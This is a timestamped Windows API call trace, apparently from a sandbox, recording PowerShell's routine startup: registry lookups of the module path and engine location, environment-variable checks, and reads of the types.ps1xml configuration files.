	[0796.336] RegQueryValueExW (in: hKey=0x2dc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d81c, lpData=0x127cb0, lpcbData=0x24d818*=0x6c | out: lpType=0x24d81c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x24d818*=0x6c) returned 0x0
	[0796.336] CoTaskMemFree (pv=0x127cb0) 
	[0796.336] CoTaskMemAlloc (cb=0xcc) returned 0x18a630
	[0796.336] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x18a630, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0796.336] CoTaskMemFree (pv=0x18a630) 
	[0796.336] CoTaskMemAlloc (cb=0xcc) returned 0x18a630
	[0796.336] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x18a630, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0796.336] CoTaskMemFree (pv=0x18a630) 
	[0797.336] RegCloseKey (hKey=0x2dc) returned 0x0
	[0797.336] CoTaskMemAlloc (cb=0xcc) returned 0x18a630
	[0797.336] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x18a630, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0797.336] CoTaskMemFree (pv=0x18a630) 
	[0797.336] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d8c8 | out: phkResult=0x24d8c8*=0x2dc) returned 0x0
	[0797.337] RegQueryValueExW (in: hKey=0x2dc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d84c, lpData=0x0, lpcbData=0x24d848*=0x0 | out: lpType=0x24d84c*=0x0, lpData=0x0, lpcbData=0x24d848*=0x0) returned 0x2
	[0797.337] RegCloseKey (hKey=0x2dc) returned 0x0
	[0797.340] CoTaskMemAlloc (cb=0x20c) returned 0x173a80
	[0797.340] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x173a80 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0797.341] CoTaskMemFree (pv=0x173a80) 
	[0797.341] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0797.343] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0797.347] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0797.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.348] CoTaskMemFree (pv=0x1817b0) 
	[0797.349] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0797.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.350] CoTaskMemFree (pv=0x1817b0) 
	[0797.357] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0797.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.357] CoTaskMemFree (pv=0x1817b0) 
	[0797.357] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0797.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.358] CoTaskMemFree (pv=0x1817b0) 
	[0797.363] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x318) returned 0x0
	[0797.363] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x24d6cc, lpData=0x0, lpcbData=0x24d6c8*=0x0 | out: lpType=0x24d6cc*=0x1, lpData=0x0, lpcbData=0x24d6c8*=0x74) returned 0x0
	[0797.363] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x24d63c, lpData=0x0, lpcbData=0x24d638*=0x0 | out: lpType=0x24d63c*=0x1, lpData=0x0, lpcbData=0x24d638*=0x74) returned 0x0
	[0797.364] CoTaskMemAlloc (cb=0x78) returned 0x127cb0
	[0797.364] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x24d60c, lpData=0x127cb0, lpcbData=0x24d608*=0x74 | out: lpType=0x24d60c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d608*=0x74) returned 0x0
	[0797.364] CoTaskMemFree (pv=0x127cb0) 
	[0797.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0797.364] SetErrorMode (uMode=0x1) returned 0x1
	[0797.364] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d590 | out: lpFileInformation=0x24d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0797.364] SetErrorMode (uMode=0x1) returned 0x1
	[0797.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0797.365] SetErrorMode (uMode=0x1) returned 0x1
	[0797.365] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d590 | out: lpFileInformation=0x24d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0797.365] SetErrorMode (uMode=0x1) returned 0x1
	[0798.478] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0798.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.478] CoTaskMemFree (pv=0x1817b0) 
	[0798.479] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0798.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.479] CoTaskMemFree (pv=0x1817b0) 
	[0798.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0798.485] SetErrorMode (uMode=0x1) returned 0x1
	[0798.486] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0798.489] GetFileType (hFile=0x31c) returned 0x1
	[0798.489] SetErrorMode (uMode=0x1) returned 0x1
	[0798.489] GetFileType (hFile=0x31c) returned 0x1
	[0798.490] ReadFile (in: hFile=0x31c, lpBuffer=0x2d82e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2d82e88*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.036] ReadFile (in: hFile=0x31c, lpBuffer=0x2d82e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2d82e88*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.037] ReadFile (in: hFile=0x31c, lpBuffer=0x2d82e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2d82e88*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.037] ReadFile (in: hFile=0x31c, lpBuffer=0x2d82e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2d82e88*, lpNumberOfBytesRead=0x24d4c8*=0xcf3, lpOverlapped=0x0) returned 1
	[0799.037] ReadFile (in: hFile=0x31c, lpBuffer=0x2d822e3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2d822e3*, lpNumberOfBytesRead=0x24d4c8*=0x0, lpOverlapped=0x0) returned 1
	[0799.037] ReadFile (in: hFile=0x31c, lpBuffer=0x2d82e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2d82e88*, lpNumberOfBytesRead=0x24d4c8*=0x0, lpOverlapped=0x0) returned 1
	[0799.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0799.040] SetErrorMode (uMode=0x1) returned 0x1
	[0799.040] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d440 | out: lpFileInformation=0x24d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0799.040] SetErrorMode (uMode=0x1) returned 0x1
	[0799.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0799.041] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d528 | out: phkResult=0x24d528*=0x31c) returned 0x0
	[0799.041] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d4ac, lpData=0x0, lpcbData=0x24d4a8*=0x0 | out: lpType=0x24d4ac*=0x1, lpData=0x0, lpcbData=0x24d4a8*=0x56) returned 0x0
	[0799.041] CoTaskMemAlloc (cb=0x5a) returned 0x18ffc0
	[0799.041] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d47c, lpData=0x18ffc0, lpcbData=0x24d478*=0x56 | out: lpType=0x24d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d478*=0x56) returned 0x0
	[0799.041] CoTaskMemFree (pv=0x18ffc0) 
	[0799.041] RegCloseKey (hKey=0x31c) returned 0x0
	[0799.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0799.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0799.062] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0799.954] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0799.954] GetFileType (hFile=0x31c) returned 0x1
	[0799.954] SetErrorMode (uMode=0x1) returned 0x1
	[0799.954] GetFileType (hFile=0x31c) returned 0x1
	[0799.954] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.955] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.955] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.955] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.955] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.955] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.956] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.956] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.956] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.958] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.958] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.959] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.959] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.959] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.960] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.960] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.960] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.964] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.964] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.964] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.965] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.965] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.966] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.966] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.966] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.967] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.967] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.967] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.968] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.968] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.969] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.969] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.969] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.847] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.847] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.847] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.848] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.848] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.848] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.849] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.849] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.850] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x1b4, lpOverlapped=0x0) returned 1
	[0800.850] ReadFile (in: hFile=0x31c, lpBuffer=0x2dea048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d4c8, lpOverlapped=0x0 | out: lpBuffer=0x2dea048*, lpNumberOfBytesRead=0x24d4c8*=0x0, lpOverlapped=0x0) returned 1
	[0800.850] CloseHandle (hObject=0x31c) returned 1
	[0800.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0800.850] SetErrorMode (uMode=0x1) returned 0x1
	[0800.850] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d440 | out: lpFileInformation=0x24d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0800.850] SetErrorMode (uMode=0x1) returned 0x1
